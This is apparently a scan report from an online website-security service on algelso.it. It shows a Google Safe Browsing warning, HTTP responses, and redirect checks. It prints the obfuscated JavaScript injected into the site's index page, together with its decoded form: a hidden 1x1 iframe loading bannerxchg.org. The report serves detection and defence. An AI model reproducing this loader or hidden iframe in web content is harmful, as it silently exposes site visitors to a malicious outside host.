Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=algelso.it
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://algelso.it/ | HTTP/1.1 200 OK Connection: close Date: Wed, 25 Feb 2015 16:58:40 GMT Accept-Ranges: bytes ETag: "babe76c4f5c5ca1:2c75" Server: Microsoft-IIS/5.0 Content-Length: 6259 Content-Location: http://algelso.it/index.html Content-Type: text/html Last-Modified: Wed, 17 Mar 2010 17:17:48 GMT X-Powered-By: ASP.NET | clean |
http://algelso.it/index.html | 200 OK Content-Length: 6259 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function func(x){var l=x.length;var b=1024;var j=Math.ceil(l/b);var i;var r;var p=0;var s=0;var w=0;var t=Array(48,20,52,42,26,30,23,16,56,43,0,0,0,0,0,0,47,17,49,51,41,61,29,35,45,53,59,57,25,31,62,33,3,36,4,22,8,38,24,60,0,10,46,0,0,0,0,58,0,50,44,13,7,11,18,63,2,28,27,40,37,6,55,39,1,5,54,14,12,21,9,19,34,32,15);for(j=j;j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w=w|((t[x.charCodeAt(p++)-48])<<s);if(s){r=r+String.fromCharCode(170^w&255);w=w>>8;s=s-2}else{s=6}}document.write(r);}}func("SstCV@WBz9VrVoWlcYbn59cQqSTaewtBzGH2veiCRStrcnkxFzbC5eWlcZLGYYWCPnb05MLGjrkxLJE2mgWlcaE0LztaPjW05zcQYYW0sJWCRdLG14LOPCtreMWC1h"); Decoded script: <iframe src='http://bannerxchg.org' width='1' height='1' style='visibility: hidden;'></iframe> Antivirus reports:
| ||
http://algelso.it/test404page.js | 404 Impossibile trovare l'oggetto. Content-Length: 4147 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: algelso.it
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 25 Feb 2015 16:58:40 GMT
Accept-Ranges: bytes
ETag: "babe76c4f5c5ca1:2c75"
Server: Microsoft-IIS/5.0
Content-Length: 6259
Content-Location: http://algelso.it/index.html
Content-Type: text/html
Last-Modified: Wed, 17 Mar 2010 17:17:48 GMT
X-Powered-By: ASP.NET
...6259 bytes of data.
GET / HTTP/1.1
Host: algelso.it
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 25 Feb 2015 16:58:40 GMT
Accept-Ranges: bytes
ETag: "babe76c4f5c5ca1:2c75"
Server: Microsoft-IIS/5.0
Content-Length: 6259
Content-Location: http://algelso.it/index.html
Content-Type: text/html
Last-Modified: Wed, 17 Mar 2010 17:17:48 GMT
X-Powered-By: ASP.NET
...6259 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: algelso.it
Referer: http://www.google.com/search?q=algelso.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: algelso.it
Referer: http://www.google.com/search?q=algelso.it
Result:
The result is similar to the first query. There are no suspicious redirects found.